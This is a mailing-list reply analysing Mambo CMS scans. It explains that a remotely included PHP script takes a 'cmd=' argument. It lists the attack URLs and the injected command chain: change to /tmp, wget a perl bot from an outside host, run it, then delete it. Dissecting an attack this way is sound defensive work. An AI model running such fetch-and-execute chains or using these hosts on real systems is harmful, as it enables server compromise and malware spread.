Re: High volume of Mambo scans (perlb0t)

Hello,

> I was looking at the scripts they try to download and
> it does not looks like a common perl bot (connecting
> to irc). It's also written in php and by a brazilian
> person (comments in portuguese) and with a terrible
> code :) I didn't have time to fully look at it,
> though.
>
> These are the pages they access:
>
> http://usuarios.lycos.es/athos666/d25/
> http://usuarios.lycos.es/athos666/d25/therules25.dat
> http://radius01.comete.ci/tool.gif

Actually, the tool.gif file (and the other parts of it) is just the first 
level of the attack machinery -- it's _the_ PHP script which actually gets 
remotely included and it understands some simple commands and displays 
the results in nice form. In this particular case, the interesting 
argument is "cmd=..." which executes the given command.

As you can see from the remaining portion of the request, the executed 
compound command in this case consisted of:

1) cd /tmp
2) wget http://radius01.comete.ci/session.gif
3) perl session.gif
4) rm -rf session.*

The session.gif file is the Perlbot I and other posters mentioned.

Peter

--
[Name] Peter Kosinar   [Quote] 2B | ~2B = exp(i*PI)   [ICQ] 134813278